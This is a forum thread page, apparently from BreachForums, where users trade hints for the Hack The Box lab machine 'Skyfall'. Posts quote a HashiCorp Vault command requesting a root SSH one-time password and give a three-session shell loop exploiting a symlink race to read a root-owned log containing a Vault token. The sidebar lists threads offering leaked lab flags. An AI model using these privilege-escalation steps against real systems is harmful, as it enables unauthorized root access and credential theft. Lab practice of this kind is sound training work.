JOIN BREACHFORUMS TELEGRAM
Looking for advanced penetration testing? What takes others days or weeks, we find in hours.
Skyfall - HTB
by paven - Saturday February 3, 2024 at 02:10 PM
Breached
Member
Posts: 12
Threads: 0
Joined: Jun 2024
Reputation: 0
#121
Jul 01, 2024, 05:38 AM
(Jun 20, 2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"
Reply
VIP User
VIP
Posts: 5
Threads: 0
Joined: Jun 2023
Reputation: 0
#122
Jul 01, 2024, 02:03 PM
(Jul 01, 2024, 05:38 AM)sharknpls Wrote:
(Jun 20, 2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"

he won't be able to SSH as root unless he has the proper vault token, which is in the debug.log file (owned by root).

Need to exploit the symlink race condition while logged in as askyy in order to get the token.
Reply
Breached
Member
Posts: 10
Threads: 0
Joined: May 2024
Reputation: 0
#123
Jul 23, 2024, 08:32 PM
(Jul 01, 2024, 02:03 PM)quarantineph2020 Wrote:
(Jul 01, 2024, 05:38 AM)sharknpls Wrote:
(Jun 20, 2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"

he won't be able to SSH as root unless he has the proper vault token, which is in the debug.log file (owned by root).

Need to exploit the symlink race condition while logged in as askyy in order to get the token.

ho to exploit this symlink race condition
please!
Reply
VIP User
VIP
Posts: 5
Threads: 0
Joined: Jun 2023
Reputation: 0
#124
Aug 12, 2024, 01:27 PM
(Jul 23, 2024, 08:32 PM)xiliobingo Wrote:
(Jul 01, 2024, 02:03 PM)quarantineph2020 Wrote:
(Jul 01, 2024, 05:38 AM)sharknpls Wrote:
(Jun 20, 2024, 09:41 AM)SpiritWolf Wrote: Anyone? Noone at all?

I think this will help you if root is what you seek:
vault write -address="http://prd23-vault-internal.skyfall.htb" ssh/creds/admin_otp_key_role ip="10.10.11.254" username="root"

he won't be able to SSH as root unless he has the proper vault token, which is in the debug.log file (owned by root).

Need to exploit the symlink race condition while logged in as askyy in order to get the token.

ho to exploit this symlink race condition
please!


Relevant article here: https://hackmd.io/@bachtam2001/BkZkudoLq

You need to open 3 SSH sessions, then:

# first SSH session - infinitely loop the symlink process for target logfile
while true; do touch /home/askyy/debug.log; ln -sf /home/askyy/debug.log /dev/shm/symlink.log; rm /dev/shm/symlink.log; done 2>/dev/null

# second SSH session - loop to try to access file contents of symlink
while true; do cat /dev/shm/symlink.log; done 2>/dev/null

# third SSH session (may need to do it a few times) - trigger the creation of the logfile
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 27 2,619 1 hour ago
Last Post: adamnowak123
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 38 3,241 1 hour ago
Last Post: adamnowak123
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 95 8,679 2 hours ago
Last Post: zxACASD
  CBBH Write Ups hiddenhacker 26 6,676 11 hours ago
Last Post: d39ug
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 606 94,492 11 hours ago
Last Post: Gotoschool

Forum Jump:


 Users browsing this forum: 1 Guest(s)